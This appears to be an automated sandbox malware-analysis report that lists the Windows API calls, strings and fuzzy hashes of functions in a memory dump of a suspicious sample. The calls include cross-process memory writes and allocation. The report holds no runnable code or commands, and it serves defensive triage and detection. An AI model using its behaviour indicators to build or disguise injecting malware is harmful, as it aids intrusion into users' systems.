                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                • String ID: REMOVE$THIS
                                • API String ID: 2528338962-776492005
                                • Opcode ID: 2ff51548d286509edb57ac99dd6db111bed223b24a83e889f1a0ded9728437ba
                                • Instruction ID: 735c96ecc80cd955b977ca47675e338c92b53981bdfa80a7db5e5e4babe3c9a9
                                • Opcode Fuzzy Hash: 2ff51548d286509edb57ac99dd6db111bed223b24a83e889f1a0ded9728437ba
                                • Instruction Fuzzy Hash: CD419074A0060AAFCF10DF54C8C5BBEB7B5BF49308F048469E956AB392DB349D45DB50
                                APIs
                                  • Part of subcall function 00CA4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C9C9FE,?,?,00000034,00000800,?,00000034), ref: 00CA4D6B
                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C9CFC9
                                  • Part of subcall function 00CA4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C9CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00CA4D36
                                  • Part of subcall function 00CA4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00CA4C90
                                  • Part of subcall function 00CA4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C9C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CA4CA0
                                  • Part of subcall function 00CA4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C9C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CA4CB6
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9D036
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                • String ID: @
                                • API String ID: 4150878124-2766056989
                                • Opcode ID: 2d5192eee81a22a3db78074387a758293c321675e77851cd1ca26c669ebd1e0a
                                • Instruction ID: 12c705a9a7ddea4d5d9f7e45d36e6607461efd114ae3e0ed7889fddb8c51d2ae
                                • Opcode Fuzzy Hash: 2d5192eee81a22a3db78074387a758293c321675e77851cd1ca26c669ebd1e0a
                                • Instruction Fuzzy Hash: 09415A72900219AEDB14DFA4CC85BDEBBB8AF49700F008095FA56BB181CA716E45DB60
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CFDBF0,00000000,?,?,?,?), ref: 00CCA4E6
                                • GetWindowLongW.USER32 ref: 00CCA503
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CCA513
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                • API String ID: 847901565-1698111956
                                • Opcode ID: bcaab2430a79ee8975b4b3cd5b9882c89309dff529aeb8be0b4a7991abdcb864
                                • Instruction ID: 3d729cfe2ef63bf0bc025c57c461e2a1ca66f284fc6dcfdaf34a4012eb6504c1
                                • Opcode Fuzzy Hash: bcaab2430a79ee8975b4b3cd5b9882c89309dff529aeb8be0b4a7991abdcb864
                                • Instruction Fuzzy Hash: 3431A031100609AFDB259E78CC49FEA7BA9EB49328F208728F975922E0D770E9519B51
                                APIs
                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CCA74F
                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CCA75D
                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CCA764
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$DestroyWindow
                                • String ID: msctls_updown32
                                • API String ID: 4014797782-2298589950
                                • Opcode ID: 03124250e14bf4eacf5645029f35108f34674ab0a08ad10b903f5ec68e60c4c7
                                • Instruction ID: 3ad2fe9ebe52e0e0b96b64238148cabb3149be318f5c8ab25f006b88965e0d77
                                • Opcode Fuzzy Hash: 03124250e14bf4eacf5645029f35108f34674ab0a08ad10b903f5ec68e60c4c7
                                • Instruction Fuzzy Hash: C4218BB5600209AFDB10DF64CCC5FA777ADEB5A398B040419FA119B361CB70EC119BA1
                                APIs
                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CC983D
                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CC984D
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CC9872
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$MoveWindow
                                • String ID: Listbox
                                • API String ID: 3315199576-2633736733
                                • Opcode ID: d986bd3675a21a25c08cc0907d494c08b4ff4902ab18f94bca7c8d33734a7609
                                • Instruction ID: f47c5f82eeecd48ba438e1dfe5e154aa79bc1a3af3eb1e7970e10db5f5f85d61
                                • Opcode Fuzzy Hash: d986bd3675a21a25c08cc0907d494c08b4ff4902ab18f94bca7c8d33734a7609
                                • Instruction Fuzzy Hash: EC21C632610158BFEF118F54DC89FBB3BAEEF8AB54F018128F9159B190C6719D51DBA0
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CCA27B
                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CCA290
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CCA29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                • API String ID: 3850602802-1010561917
                                • Opcode ID: b08ac2de064f9f99c1d49205457304653ea0befd6efb80eee5f79ca7b09476fb
                                • Instruction ID: f6f53ce401550d3e1f3e186650978beb9a85b59233fb6292ca34eb0499609c2b
                                • Opcode Fuzzy Hash: b08ac2de064f9f99c1d49205457304653ea0befd6efb80eee5f79ca7b09476fb
                                • Instruction Fuzzy Hash: 7511E771240308BFDB205F65DC46F9B3B69EF89B58F01411CFA55A6090D672D851DB60
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C83028,?), ref: 00C82F79
                                • GetProcAddress.KERNEL32(00000000), ref: 00C82F80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RoInitialize$combase.dll
                                • API String ID: 2574300362-340411864
                                • Opcode ID: bf69e2fb1df2f035e893820741d17a739d5522bf16053dc9878b56ea165da401
                                • Instruction ID: 4ec7b641bdf15950a403291440989f23298c6eb9f09a46d6c34eeeb7a011c0da
                                • Opcode Fuzzy Hash: bf69e2fb1df2f035e893820741d17a739d5522bf16053dc9878b56ea165da401
                                • Instruction Fuzzy Hash: 1BE04F70694351AFDB216FB5ED8DB593A68B71474AF004034F213D52E1CBB54592DF28
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C82F4E), ref: 00C8304E
                                • GetProcAddress.KERNEL32(00000000), ref: 00C83055
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RoUninitialize$combase.dll
                                • API String ID: 2574300362-2819208100
                                • Opcode ID: 435f2d13239d7fbd4ee1689ae8fd1a68dbfd10db60e6ffb88c4a32d40efa3be7
                                • Instruction ID: 4e5fa70a3b598bfd0618d8d5f9276c770d2e7cecf74f363e535904db8f6d8120
                                • Opcode Fuzzy Hash: 435f2d13239d7fbd4ee1689ae8fd1a68dbfd10db60e6ffb88c4a32d40efa3be7
                                • Instruction Fuzzy Hash: 59E0EC70645380EFDB325F61EE0EB493E64B714B46F101024F51AD52B9CFB54611DB39
                                APIs
                                Strings
                                Similarity
                                • API ID: LocalTime__swprintf
                                • String ID: %.3d$WIN_XPe
                                • API String ID: 2070861257-2409531811
                                • Opcode ID: 37056bc5abef128d28dff4e67776558f118960cb7b264f0894d176c6fc625ccf
                                • Instruction ID: 1ea0da15d05309dc4f28d95273b8870eb6d8add432db94ae2303d958caa9654e
                                • Opcode Fuzzy Hash: 37056bc5abef128d28dff4e67776558f118960cb7b264f0894d176c6fc625ccf
                                • Instruction Fuzzy Hash: B6E0127180801CFBC754D6929C46AFE73BCAB08300F5184D3BA1E92100D7359F94BB26
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C7E6D9,?,00C7E55B,00CFDC28,?,?), ref: 00C7E6F1
                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00C7E703
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: IsWow64Process$kernel32.dll
                                • API String ID: 2574300362-3024904723
                                • Opcode ID: 41c255567ba957346262f62ffc8bd8342df4fa3cc53c63df899c129f4931b6bc
                                • Instruction ID: 19c77b3bc30ee685fc1c4db74962fb7483eeb659d82e68718131d307591db27a
                                • Opcode Fuzzy Hash: 41c255567ba957346262f62ffc8bd8342df4fa3cc53c63df899c129f4931b6bc
                                • Instruction Fuzzy Hash: 34D0A7355003529FD7242F20F88C75B3BD4BB08310B00945DF4AAD2150DB70C4D08720
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C7E69C,756F0AE0,00C7E5AC,00CFDC28,?,?), ref: 00C7E6B4
                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C7E6C6
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetNativeSystemInfo$kernel32.dll
                                • API String ID: 2574300362-192647395
                                • Opcode ID: 17f272509e5d410fd25c200bd362608981fab4f835e4fc6cb2c39daf164ff024
                                • Instruction ID: 7ea632359a1ab5b457e7cc7657fa3600924e261756379d49911406f62a31832d
                                • Opcode Fuzzy Hash: 17f272509e5d410fd25c200bd362608981fab4f835e4fc6cb2c39daf164ff024
                                • Instruction Fuzzy Hash: 76D0A7354003529FD7205F30F85875A36D4AB28311B00A45DF45AD1170DB70D4D08760
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00CBEBAF,?,00CBEAAC), ref: 00CBEBC7
                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBEBD9
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                • API String ID: 2574300362-1816364905
                                • Opcode ID: c74aaae430bc43d222f2aea47f94feb62f76cde23eb29a721a263631c612e1f3
                                • Instruction ID: 3591da14a087429d15d69deb5fb6d1251b04da8050eb9f3c76053f482b6907d4
                                • Opcode Fuzzy Hash: c74aaae430bc43d222f2aea47f94feb62f76cde23eb29a721a263631c612e1f3
                                • Instruction Fuzzy Hash: E4D0C7745047529FD7205F75F888BD976D4AF18715F10982DF467D1150DFB0D8C48764
                                APIs
                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CA1371,?,00CA1519), ref: 00CA13B4
                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CA13C6
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                • API String ID: 2574300362-1587604923
                                • Opcode ID: b34e6fbeee0fad78aed027b9c02e00f07d6538d964e10fe60fa5bd9ccc52ce5b
                                • Instruction ID: f95f3a1f8de1cb6769b1f15a09893b014408c033de5b03b968763c37f3134bd9
                                • Opcode Fuzzy Hash: b34e6fbeee0fad78aed027b9c02e00f07d6538d964e10fe60fa5bd9ccc52ce5b
                                • Instruction Fuzzy Hash: 74D0A730440313AFDB200F25F84874D36E8AF4431DF04541DE866D5570DE70C5C88720
                                APIs
                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CA135F,?,00CA1440), ref: 00CA1389
                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CA139B
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                • API String ID: 2574300362-1071820185
                                • Opcode ID: 4e15156a35d87e18befb5ef38c126c96fc0f81ddfbaa364c5487d1e11a96d278
                                • Instruction ID: 467b8dbdb5af92c0873f91dda00e4637c2ecb55f3ccee9312992898cbab01378
                                • Opcode Fuzzy Hash: 4e15156a35d87e18befb5ef38c126c96fc0f81ddfbaa364c5487d1e11a96d278
                                • Instruction Fuzzy Hash: AFD0A770900313BFDB204F24F84878936D4AF08319F08441DE896D1560DA70C5C48720
                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00CC3AC2,?,00CC3CF7), ref: 00CC3ADA
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CC3AEC
                                Strings
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2574300362-4033151799
                                • Opcode ID: 0749d33963bf6c11449b70c2767d7127f3758cdc5e6187f12d95732c43fc6a6b
                                • Instruction ID: 7ce5b7606be1291408a0ba67a7d87e8d97d51d39065869931bd5899506c50b2e
                                • Opcode Fuzzy Hash: 0749d33963bf6c11449b70c2767d7127f3758cdc5e6187f12d95732c43fc6a6b
                                • Instruction Fuzzy Hash: C2D09E705007539ED7209BA5FC49B8976D4AB15715B10942DE4A692550EEB0C5848660
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: af09252fb5f3a494c8ba6e2982d73191d68c58c3128ea09a602936a2f2685538
                                • Instruction ID: b850b9e818710c89105820e1ccaa9793c31e0a854010268a0d50f6a6cb35f991
                                • Opcode Fuzzy Hash: af09252fb5f3a494c8ba6e2982d73191d68c58c3128ea09a602936a2f2685538
                                • Instruction Fuzzy Hash: 55C18E75A00216EFCF14CF95C988EAEB7B5FF48700F104599E916AB251D730DE81DBA1
                                APIs
                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00CB6AA6), ref: 00C6AB2D
                                • _wcscmp.LIBCMT ref: 00C6AB49
                                Similarity
                                • API ID: BuffCharUpper_wcscmp
                                • String ID:
                                • API String ID: 820872866-0
                                • Opcode ID: 86db3a13bb030341dd4fb80cbca70c2c98d4d099fbf48149c39c2847fa36631a
                                • Instruction ID: f6bc2b686204184f66033a08c673105741b40960f2cbee81b0a7af6e94583e0b
                                • Opcode Fuzzy Hash: 86db3a13bb030341dd4fb80cbca70c2c98d4d099fbf48149c39c2847fa36631a
                                • Instruction Fuzzy Hash: 79A1347070010AEBDB24DF65E8C06BDB7A1FF44300F64816AEC56E3290DB319871EB56
                                APIs
                                • CharLowerBuffW.USER32(?,?), ref: 00CC0D85
                                • CharLowerBuffW.USER32(?,?), ref: 00CC0DC8
                                  • Part of subcall function 00CC0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00CC0478
                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CC0FB2
                                • _memmove.LIBCMT ref: 00CC0FC2
                                Similarity
                                • API ID: BuffCharLower$AllocVirtual_memmove
                                • String ID:
                                • API String ID: 3659485706-0
                                • Opcode ID: 1878851d3a240016897f1ab3c6e3fa6d07eba421f742b857828781c9b9410450
                                • Instruction ID: c9a921f6a551f3ab8b98ef95c8f008e8d18e31b9ea27881f51314dab2958e1f6
                                • Opcode Fuzzy Hash: 1878851d3a240016897f1ab3c6e3fa6d07eba421f742b857828781c9b9410450
                                • Instruction Fuzzy Hash: 2BB16D71604300DFC714DF28C880A6AB7E4EF89714F24896DF99A9B352DB31EE46DB91
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00CBAF56
                                • CoUninitialize.OLE32 ref: 00CBAF61
                                  • Part of subcall function 00CA1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA10B8
                                • VariantInit.OLEAUT32(?), ref: 00CBAF6C
                                • VariantClear.OLEAUT32(?), ref: 00CBB23F
                                Similarity
                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                • String ID:
                                • API String ID: 780911581-0
                                • Opcode ID: b408fba0722dc163a040b26cc6e59f1b84fbee02c5c8f68f66d46f7fb512847c
                                • Instruction ID: 409bc2e0cce8ed4c014b06ddd6b9a25115260cc1b1b2b1f66a19b323848e7a22
                                • Opcode Fuzzy Hash: b408fba0722dc163a040b26cc6e59f1b84fbee02c5c8f68f66d46f7fb512847c
                                • Instruction Fuzzy Hash: E4A14A756047019FD710DF18C891B6EB7E4BF88360F048559FAAAAB3A1CB70ED44DB82
                                APIs
                                • _memmove.LIBCMT ref: 00C6C419
                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00CA6653,?,?,00000000), ref: 00C6C495
                                Similarity
                                • API ID: FileRead_memmove
                                • String ID:
                                • API String ID: 1325644223-0
                                • Opcode ID: 2ee75af0688d06866a9d4b721ad385320e8e4534de1262dc5a085da82f6f9bf9
                                • Instruction ID: bd4bec8dde66b1b03c221bd391289f6a8053504f620f1ff3b6f5cb4d51b78467
                                • Opcode Fuzzy Hash: 2ee75af0688d06866a9d4b721ad385320e8e4534de1262dc5a085da82f6f9bf9
                                • Instruction Fuzzy Hash: A3A1BB70A04605EBDB24CF66C8C4BB9BBB0FF05300F14C1A6E9A5DA391DB35D961DBA1
                                APIs
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                • String ID:
                                • API String ID: 3877424927-0
                                • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                • Instruction ID: 43761e0543d420fb0f29cf1bc31bfd9b2b62ea0b531497d62760fee4137669a1
                                • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                • Instruction Fuzzy Hash: 9151A970A00307DBDB2CAF69888066E77A5AF8132CF24872DF875962E1D7709E519B48
                                APIs
                                  • Part of subcall function 00C641A7: _fseek.LIBCMT ref: 00C641BF
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF49
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF5C
                                • _free.LIBCMT ref: 00CACDC9
                                • _free.LIBCMT ref: 00CACDD0
                                • _free.LIBCMT ref: 00CACE3B
                                  • Part of subcall function 00C828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828DE
                                  • Part of subcall function 00C828CA: GetLastError.KERNEL32(00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828F0
                                • _free.LIBCMT ref: 00CACE43
                                Similarity
                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                • String ID:
                                • API String ID: 1552873950-0
                                • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                                • Instruction ID: dfcd21b86d5d4ecd5252b19eaa1dc880d88b86adc4f61a1c7376c68bcef9bd26
                                • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                                • Instruction Fuzzy Hash: 27516DB1D04219AFDF249F64CC81AAEBBB9FF09304F1000AEF219A3281D7715E809F19
                                APIs
                                • GetWindowRect.USER32(00DF55A0,?), ref: 00CCC354
                                • ScreenToClient.USER32(?,00000002), ref: 00CCC384
                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CCC3EA
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: 0eb93e5c9e7d116283ba81e5dca4a138e0b6bb46a3227245d6b1cab9e98a8594
                                • Instruction ID: 94262dd6d16fd28cf11868e9049b33d4c552ca9499535394f99ca2d673ef5eef
                                • Opcode Fuzzy Hash: 0eb93e5c9e7d116283ba81e5dca4a138e0b6bb46a3227245d6b1cab9e98a8594
                                • Instruction Fuzzy Hash: 7A515A35900245AFCF24DF68D8C0FAE7BA6AB55320F248559F8299B290D730AE41CB90
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C9D258
                                • __itow.LIBCMT ref: 00C9D292
                                  • Part of subcall function 00C9D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C9D549
                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C9D2FB
                                • __itow.LIBCMT ref: 00C9D350
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$__itow
                                • String ID:
                                • API String ID: 3379773720-0
                                • Opcode ID: 4407a7353ea29e137ddedb1f47461b168f62a2e7901878e0001f9aab066accd3
                                • Instruction ID: 90c99bdeac9b3da208b7ccad101cec2793015eca1b89aee6bf9c6325d86e77a5
                                • Opcode Fuzzy Hash: 4407a7353ea29e137ddedb1f47461b168f62a2e7901878e0001f9aab066accd3
                                • Instruction Fuzzy Hash: AB41A771A00609AFDF25DF54C886BEE7BB9AF48700F000025FA16B7191DB759F45DB51
                                APIs
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CAEF32
                                • GetLastError.KERNEL32(?,00000000), ref: 00CAEF58
                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CAEF7D
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CAEFA9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: 0c764bb67d860b3065782999c354aaab419fd4a64cafe21e44203be1d21306a6
                                • Instruction ID: 6e74844b643df37c6e7daad4bf9d6595c0d97d1442aaa51ed466c3fcc8009d3f
                                • Opcode Fuzzy Hash: 0c764bb67d860b3065782999c354aaab419fd4a64cafe21e44203be1d21306a6
                                • Instruction Fuzzy Hash: 16416D35600611DFCB20EF19C994A5DBBE5EF89324B19C088E94AAF362CB34FD04DB91
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CCB3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: db6f08d2f174a8bc001ca0e338bf6cac5df14d148388a962c14d77e8829f8c78
                                • Instruction ID: dc5c4c0456f7b5385d72db62e78130bb3518a90209a7ef5d76a6d13d77878952
                                • Opcode Fuzzy Hash: db6f08d2f174a8bc001ca0e338bf6cac5df14d148388a962c14d77e8829f8c78
                                • Instruction Fuzzy Hash: C831D234604244FBEF28DF98DDC7FAC3765AB05350F14851AFA62DA2A2CB31DE419B61
                                APIs
                                • ClientToScreen.USER32(?,?), ref: 00CCD617
                                • GetWindowRect.USER32(?,?), ref: 00CCD68D
                                • PtInRect.USER32(?,?,00CCEB2C), ref: 00CCD69D
                                • MessageBeep.USER32(00000000), ref: 00CCD70E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
